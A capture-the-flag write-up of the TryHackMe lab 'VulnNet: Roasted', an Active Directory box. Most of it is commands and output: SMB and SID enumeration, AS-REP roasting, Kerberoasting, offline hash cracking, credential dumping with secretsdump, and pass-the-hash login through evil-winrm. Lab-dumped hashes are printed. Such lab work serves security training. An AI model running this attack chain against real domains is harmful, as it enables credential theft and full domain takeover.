THM Writeup – VulnNet: Roasted
VulnNet Entertainment quickly deployed another management instance on their very broad network…
VulnNet Entertainment just deployed a new instance on their network with the newly-hired system administrators. Being a security-aware company, they as always hired you to perform a penetration test, and see how system administrators are performing.
This is a much simpler machine, do not overthink. You can do it by following common methodologies.
Add IP address to your hosts file:
echo '10.10.202.234 roasted.thm' >> /etc/hostsScan the target machine – find open ports first:
nmap -n -Pn -sS -p- --open -min-rate 5000 -vvv roasted.thm
PORT STATE SERVICE REASON
53/tcp open domain syn-ack ttl 128
88/tcp open kerberos-sec syn-ack ttl 128
135/tcp open msrpc syn-ack ttl 128
139/tcp open netbios-ssn syn-ack ttl 128
389/tcp open ldap syn-ack ttl 128
445/tcp open microsoft-ds syn-ack ttl 128
464/tcp open kpasswd5 syn-ack ttl 128
593/tcp open http-rpc-epmap syn-ack ttl 128
636/tcp open ldapssl syn-ack ttl 128
3268/tcp open globalcatLDAP syn-ack ttl 128
3269/tcp open globalcatLDAPssl syn-ack ttl 128
5985/tcp open wsman syn-ack ttl 128
9389/tcp open adws syn-ack ttl 128
49665/tcp open unknown syn-ack ttl 128
49668/tcp open unknown syn-ack ttl 128
49669/tcp open unknown syn-ack ttl 128
49670/tcp open unknown syn-ack ttl 128
49677/tcp open unknown syn-ack ttl 128
49690/tcp open unknown syn-ack ttl 128
49706/tcp open unknown syn-ack ttl 128Get more details about open ports:
nmap -T4 -A -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49665,49668-49670,49677,49690,49706 roasted.thm
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-03-10 07:22:07Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49665/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc Microsoft Windows RPC
49690/tcp open msrpc Microsoft Windows RPC
49706/tcp open msrpc Microsoft Windows RPCEnumerate SMB – first, download enum4linux and make it executable:
root@ip-10-10-185-72:~# wget https://raw.githubusercontent.com/CiscoCXSecurity/enum4linux/master/enum4linux.pl
chmod +x enum4linux.plList shares:
root@ip-10-10-185-72:~# ./enum4linux.pl -S roasted.thm
WARNING: polenum is not in your path. Check that package is installed and your PATH is sane.
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Mar 11 07:12:05 2022
=========================================( Target Information )=========================================
Target ........... roasted.thm
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
============================( Enumerating Workgroup/Domain on roasted.thm )============================
[+] Got domain/workgroup name: VULNNET-RST
====================================( Session Check on roasted.thm )====================================
[+] Server roasted.thm allows sessions using username '', password ''
=================================( Getting domain SID for roasted.thm )=================================
Domain Name: VULNNET-RST
Domain Sid: S-1-5-21-1589833671-435344116-4136949213
[+] Host is part of a domain (not a workgroup)
==================================( Share Enumeration on roasted.thm )==================================
WARNING: The "syslog" option is deprecated
smb1cli_req_writev_submit: called for dialect[SMB3_11] server[roasted.thm]
Sharename Type Comment
--------- ---- -------
Error returning browse list: NT_STATUS_REVISION_MISMATCH
Reconnecting with SMB1 for workgroup listing.
Connection to roasted.thm failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Failed to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on roasted.thmAs we can see this tool was not able to list SMB shares. We have to use other tool.
Let’s try smbmap – locate your installation path, change directory and list files and dirs:
root@ip-10-10-185-72:~# locate smbmap
/opt/smbmap
/opt/smbmap/LICENSE
/opt/smbmap/README.md
/opt/smbmap/psutils
/opt/smbmap/requirements.txt
/opt/smbmap/smbmap.py
/opt/smbmap/psutils/Get-FileLockProcess.ps1
/root/Desktop/Tools/Miscellaneous/smbmap
root@ip-10-10-19-31:~# cd /opt/smbmap/
root@ip-10-10-19-31:/opt/smbmap# ls
LICENSE psutils README.md requirements.txt smbmap.pyRun smbmap against our target machine:
root@ip-10-10-185-72:/opt/smbmap# ./smbmap.py -H roasted.thm -u anonymous
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[+] IP: roasted.thm:445 Name: unknown Status: Guest session
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
SYSVOL NO ACCESS Logon server share
VulnNet-Business-Anonymous READ ONLY VulnNet Business Sharing
VulnNet-Enterprise-Anonymous READ ONLY VulnNet Enterprise SharingFor us as anonymous user, IPC$ is read only – it means we can enumerate users.
We’re going to use Impacket so let’s install it (if you don’t have it already) – use this installation instructions.
Enumerate SMB usernames:
root@ip-10-10-185-72:~# python3 /opt/impacket/examples/lookupsid.py anonymous@roasted.thm
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
Password:
[*] Brute forcing SIDs at roasted.thm
[*] StringBinding ncacn_np:roasted.thm[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-1589833671-435344116-4136949213
498: VULNNET-RST\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: VULNNET-RST\Administrator (SidTypeUser)
501: VULNNET-RST\Guest (SidTypeUser)
502: VULNNET-RST\krbtgt (SidTypeUser)
512: VULNNET-RST\Domain Admins (SidTypeGroup)
513: VULNNET-RST\Domain Users (SidTypeGroup)
514: VULNNET-RST\Domain Guests (SidTypeGroup)
515: VULNNET-RST\Domain Computers (SidTypeGroup)
516: VULNNET-RST\Domain Controllers (SidTypeGroup)
517: VULNNET-RST\Cert Publishers (SidTypeAlias)
518: VULNNET-RST\Schema Admins (SidTypeGroup)
519: VULNNET-RST\Enterprise Admins (SidTypeGroup)
520: VULNNET-RST\Group Policy Creator Owners (SidTypeGroup)
521: VULNNET-RST\Read-only Domain Controllers (SidTypeGroup)
522: VULNNET-RST\Cloneable Domain Controllers (SidTypeGroup)
525: VULNNET-RST\Protected Users (SidTypeGroup)
526: VULNNET-RST\Key Admins (SidTypeGroup)
527: VULNNET-RST\Enterprise Key Admins (SidTypeGroup)
553: VULNNET-RST\RAS and IAS Servers (SidTypeAlias)
571: VULNNET-RST\Allowed RODC Password Replication Group (SidTypeAlias)
572: VULNNET-RST\Denied RODC Password Replication Group (SidTypeAlias)
1000: VULNNET-RST\WIN-2BO8M1OE1M1$ (SidTypeUser)
1101: VULNNET-RST\DnsAdmins (SidTypeAlias)
1102: VULNNET-RST\DnsUpdateProxy (SidTypeGroup)
1104: VULNNET-RST\enterprise-core-vn (SidTypeUser)
1105: VULNNET-RST\a-whitehat (SidTypeUser)
1109: VULNNET-RST\t-skid (SidTypeUser)
1110: VULNNET-RST\j-goldenhand (SidTypeUser)
1111: VULNNET-RST\j-leet (SidTypeUser)Add all SidTypeUsers to a file named e.g. users.txt:
Administrator
Guest
krbtgt
WIN-2BO8M1OE1M1$
enterprise-core-vn
a-whitehat
t-skid
j-goldenhand
j-leetGet hashes of those users:
root@ip-10-10-185-72:~# python3 /opt/impacket/examples/GetNPUsers.py 'VULNNET-RST/' -usersfile users.txt -no-pass -dc-ip roasted.thm
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User WIN-2BO8M1OE1M1$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User enterprise-core-vn doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User a-whitehat doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$t-skid@VULNNET-RST:85cd62d1371ebf288b277e8255421dd2$e2d90c8a04550ab234e8951fd6bef1d5cbe5536c6b51d3d921c017154aba56d0675e571733b67b5e15c31281940c3d8c28b84b244a59fbad878aaa112395881e0f9b35c1850cd8dc96c25f4d96467d3e7d6706d42adbe2dc5cf439279fd297e7baeff4ced7eda3d26442e922a6665126b179ab43334d2fcab21440986136d441fa7380811114ccd493549a9fc2a4b7015d7e73d197e86fc028abdd2309b1bd60100d83b51fd825febee303697888dddb7178032fe1d853a74c5354e1c370aa3a62b4cc1dae74525e30141ee9e9ced48f00f4347e23dc3a4cc50c1783d18efe0d88e141ea9db917723981f7e9812f72a3
[-] User j-goldenhand doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j-leet doesn't have UF_DONT_REQUIRE_PREAUTH setAdd the hash to a file named e.g. hash.txt
And crack it:
root@ip-10-10-185-72:~# john -w:/usr/share/wordlists/rockyou.txt hash.txt
Warning: detected hash type "krb5asrep", but the string is also recognized as "krb5asrep-aes-opencl"
Use the "--format=krb5asrep-aes-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
[REDACTED] (?)
Now we know password for user t-skid, however these credentials are for remote IPC service.
Retrieve Kerberos tickets:
root@ip-10-10-185-72:~# python3 /opt/impacket/examples/GetUserSPNs.py 'VULNNET-RST.local/t-skid:[REDACTED]' -outputfile kerberos.hash -dc-ip roasted.thm
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------- ------------------ ------------------------------------------------------------- -------------------------- -------------------------- ----------
CIFS/vulnnet-rst.local enterprise-core-vn CN=Remote Management Users,CN=Builtin,DC=vulnnet-rst,DC=local 2021-03-11 19:45:09.913979 2021-03-13 23:41:17.987528Crack the kerberos hash:
root@ip-10-10-185-72:~# john -w:/usr/share/wordlists/rockyou.txt kerberos.hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
[REDACTED] (?)We’ve just revealed password for user enterprise-core-vn
Log in as user enterprise-core-vn:
root@ip-10-10-185-72:~# evil-winrm -u 'enterprise-core-vn' -p '[REDACTED]' -i roasted.thm
Evil-WinRM shell v2.4
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\enterprise-core-vn\Documents>Find the user flag and read it:
*Evil-WinRM* PS C:\Users\enterprise-core-vn\Documents> cd ..
*Evil-WinRM* PS C:\Users\enterprise-core-vn> cd Desktop
*Evil-WinRM* PS C:\Users\enterprise-core-vn\Desktop> dir
Directory: C:\Users\enterprise-core-vn\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/13/2021 3:43 PM 39 user.txt
*Evil-WinRM* PS C:\Users\enterprise-core-vn\Desktop> more user.txt
THM{[REDACTED]}Enumerate SMB again, this time with username and password we found:
root@ip-10-10-185-72:/opt/smbmap# ./smbmap.py -H roasted.thm -u 'enterprise-core-vn' -p '[REDACTED]'
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[+] IP: roasted.thm:445 Name: unknown Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
VulnNet-Business-Anonymous READ ONLY VulnNet Business Sharing
VulnNet-Enterprise-Anonymous READ ONLY VulnNet Enterprise SharingThere is a new share SYSVOL that we can access.
Log into SYSVOL to see if there’s anything interesting:
root@ip-10-10-185-72:~# smbclient //roasted.thm/SYSVOL --user=enterprise-core-vn%[REDACTED]
WARNING: The "syslog" option is deprecated
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Mar 11 19:19:49 2021
.. D 0 Thu Mar 11 19:19:49 2021
vulnnet-rst.local D 0 Thu Mar 11 19:19:49 2021
8771839 blocks of size 4096. 4555302 blocks available
smb: \> cd vulnnet-rst.local
smb: \vulnnet-rst.local\> ls
. D 0 Thu Mar 11 19:23:40 2021
.. D 0 Thu Mar 11 19:23:40 2021
DfsrPrivate DHS 0 Thu Mar 11 19:23:40 2021
Policies D 0 Thu Mar 11 19:20:26 2021
scripts D 0 Tue Mar 16 23:15:49 2021
8771839 blocks of size 4096. 4555302 blocks available
smb: \vulnnet-rst.local\> cd scripts
smb: \vulnnet-rst.local\scripts\> ls
. D 0 Tue Mar 16 23:15:49 2021
.. D 0 Tue Mar 16 23:15:49 2021
ResetPassword.vbs A 2821 Tue Mar 16 23:18:14 2021
8771839 blocks of size 4096. 4555295 blocks available
smb: \vulnnet-rst.local\scripts\> get ResetPassword.vbs
getting file \vulnnet-rst.local\scripts\ResetPassword.vbs of size 2821 as ResetPassword.vbs (9.5 KiloBytes/sec) (average 9.5 KiloBytes/sec)We found an interesting file that we downloaded.
See the file content:
root@ip-10-10-185-72:~# cat ResetPassword.vbs
Option Explicit
Dim objRootDSE, strDNSDomain, objTrans, strNetBIOSDomain
Dim strUserDN, objUser, strPassword, strUserNTName
' Constants for the NameTranslate object.
Const ADS_NAME_INITTYPE_GC = 3
Const ADS_NAME_TYPE_NT4 = 3
Const ADS_NAME_TYPE_1779 = 1
If (Wscript.Arguments.Count <> 0) Then
Wscript.Echo "Syntax Error. Correct syntax is:"
Wscript.Echo "cscript ResetPassword.vbs"
Wscript.Quit
End If
strUserNTName = "a-whitehat"
strPassword = "[REDACTED]"
...We found credentials for user a-whitehat
Enumerate the SMB once again:
root@ip-10-10-185-72:/opt/smbmap# ./smbmap.py -H roasted.thm -u 'a-whitehat' -p '[REDACTED]'
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[+] IP: roasted.thm:445 Name: unknown Status: ADMIN!!!
[/] Work[!] Unable to remove test directory at \\roasted.thm\SYSVOL\TGZHNXPEAQ, please remove manually
Disk Permissions Comment
---- ----------- -------
ADMIN$ READ, WRITE Remote Admin
C$ READ, WRITE Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ, WRITE Logon server share
SYSVOL READ, WRITE Logon server share
VulnNet-Business-Anonymous READ ONLY VulnNet Business Sharing
VulnNet-Enterprise-Anonymous READ ONLY VulnNet Enterprise SharingGreat, with this user we are administrator and we have write permissions.
Dump hashes with those admin credentials:
root@ip-10-10-185-72:~# python3 /opt/impacket/examples/secretsdump.py VULNNET-RST.local/a-whitehat:[REDACTED]@roasted.thm
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xf10a2788aef5f622149a41b2c745f49a
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c2597747aa5e43022a3a3049a3c3b09d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
VULNNET-RST\WIN-2BO8M1OE1M1$:aes256-cts-hmac-sha1-96:ed44407a6793ec47796802e3772169956b36f02f2a5f4d8388e7bdd8dd45c07d
VULNNET-RST\WIN-2BO8M1OE1M1$:aes128-cts-hmac-sha1-96:2a35e320aeb8eba88b772649024d5de1
VULNNET-RST\WIN-2BO8M1OE1M1$:des-cbc-md5:d6315b5de96ee0ba
VULNNET-RST\WIN-2BO8M1OE1M1$:aad3b435b51404eeaad3b435b51404ee:950b9313a13e4ca30dc044668050bb12:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0x20809b3917494a0d3d5de6d6680c00dd718b1419
dpapi_userkey:0xbf8cce326ad7bdbb9bbd717c970b7400696d3855
[*] NL$KM
0000 F3 F6 6B 8D 1E 2A F4 8E 85 F6 7A 46 D1 25 A0 D3 ..k..*....zF.%..
0010 EA F4 90 7D 2D CB A5 8C 88 C5 68 4C 1E D3 67 3B ...}-.....hL..g;
0020 DB 31 D9 91 C9 BB 6A 57 EA 18 2C 90 D3 06 F8 31 .1....jW..,....1
0030 7C 8C 31 96 5E 53 5B 85 60 B4 D5 6B 47 61 85 4A |.1.^S[.`..kGa.J
NL$KM:f3f66b8d1e2af48e85f67a46d125a0d3eaf4907d2dcba58c88c5684c1ed3673bdb31d991c9bb6a57ea182c90d306f8317c8c31965e535b8560b4d56b4761854a
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:[REDACTED]:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:7633f01273fc92450b429d6067d1ca32:::Take administrator’s hash and log in:
root@ip-10-10-185-72:~# evil-winrm -i roasted.thm -u Administrator -H [REDACTED]
Evil-WinRM shell v2.4
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
vulnnet-rst\administratorFind the system flag and read it:
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/13/2021 3:34 PM 39 system.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> more system.txt
THM{[REDACTED]}Do you like this writeup? Check out other THM Writeups.